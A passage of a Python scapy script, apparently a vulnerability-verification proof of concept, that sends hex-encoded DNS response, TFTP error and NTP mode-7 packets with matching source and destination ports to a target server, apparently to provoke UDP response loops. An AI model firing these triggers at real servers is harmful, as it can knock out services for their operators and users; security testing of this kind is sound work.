'860c818000010001000d000d076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304000002000100032d90001401620c726f6f742d73657276657273036e657400000002000100032d90001401670c726f6f742d73657276657273036e657400000002000100032d900014016c0c726f6f742d73657276657273036e657400000002000100032d900014016d0c726f6f742d73657276657273036e657400000002000100032d90001401650c726f6f742d73657276657273036e657400000002000100032d90001401660c726f6f742d73657276657273036e657400000002000100032d90001401690c726f6f742d73657276657273036e657400000002000100032d90001401680c726f6f742d73657276657273036e657400000002000100032d90001401610c726f6f742d73657276657273036e657400000002000100032d900014016a0c726f6f742d73657276657273036e657400000002000100032d900014016b0c726f6f742d73657276657273036e657400000002000100032d90001401640c726f6f742d73657276657273036e657400000002000100032d90001401630c726f6f742d73657276657273036e65740001620c726f6f742d73657276657273036e6574000001000100078b000004c7090ec901670c726f6f742d73657276657273036e6574000001000100013f420004c0702404016c0c726f6f742d73657276657273036e657400000100010000ccf20004c707532a016d0c726f6f742d73657276657273036e65740000010001000798450004ca0c1b2101650c726f6f742d73657276657273036e65740000010001000038440004c0cbe60a01660c726f6f742d73657276657273036e657400000100010007c5220004c00505f101690c726f6f742d73657276657273036e65740000010001000713640004c024941101680c726f6f742d73657276657273036e657400000100010004c16f0004c661be3501610c726f6f742d73657276657273036e65740000010001000793600004c6290004016a0c726f6f742d73657276657273036e65740000010001000899c40004c03a801e016b0c726f6f742d73657276657273036e65740000010001000713640004c1000e8101640c726f6f742d73657276657273036e657400000100010002c0e30004c7075b0d01630c726f6f742d73657276657273036e6574000001000100069bb20004c021040c', 9 | '697481810001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d00000100010000ffb5000401020304', 10 | '411e81820001000000000000076578616d706c6503636f6d0000010001', 11 | '163481820001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304', 12 | '860c85800001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304', 13 | 'a74580800001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304' 14 | ] 15 | 16 | TFTP_triggers = [ 17 | '000000036e616d65696e76616c69642072657175657374', 18 | '000500004163636573732076696f6c6174696f6e00', 19 | '00050004496c6c6567616c2054465450206f7065726174696f6e', 20 | '000500044261642046696c656e616d6500', 21 | '00050004340000', 22 | '00050005496c6c6567616c2054494400' 23 | ] 24 | 25 | 26 | NTP_triggers = [ 27 | '9700060010000000', 28 | '9f00060010000000', 29 | '9f001a0e10000000', 30 | '97001a0e30000000', 31 | '9f00203410000000', 32 | '9700203430000000', 33 | '9f000a0010000000', 34 | '97000a0030000000' 35 | ] 36 | 37 | 38 | 39 | import sys 40 | import time 41 | from scapy.all import * 42 | 43 | if __name__ == '__main__': 44 | if len(sys.argv)!=3: 45 | print("Usage:","python3 simple_verify.py ") 46 | exit(-1) 47 | 48 | proto = sys.argv[1] 49 | server_ip = sys.argv[2] 50 | ip_hdr = IP(dst=server_ip) 51 | 52 | if proto.lower()=='dns': 53 | udp_hdr = UDP(sport=53,dport=53) 54 | for load in DNS_triggers: 55 | send(ip_hdr/udp_hdr/bytes.fromhex(load)) 56 | time.sleep(0.5) 57 | elif proto.lower()=='ntp': 58 | udp_hdr = UDP(sport=123,dport=123) 59 | for load in NTP_triggers: 60 | send(ip_hdr/udp_hdr/bytes.fromhex(load)) 61 | time.sleep(0.5) 62 | elif proto.lower()=='tftp': 63 | udp_hdr = UDP(sport=69,dport=69) 64 | for load in TFTP_triggers: 65 | send(ip_hdr/udp_hdr/bytes.fromhex(load)) 66 | time.sleep(0.5) 67 | 68 | 69 | 70 | --------------------------------------------------------------------------------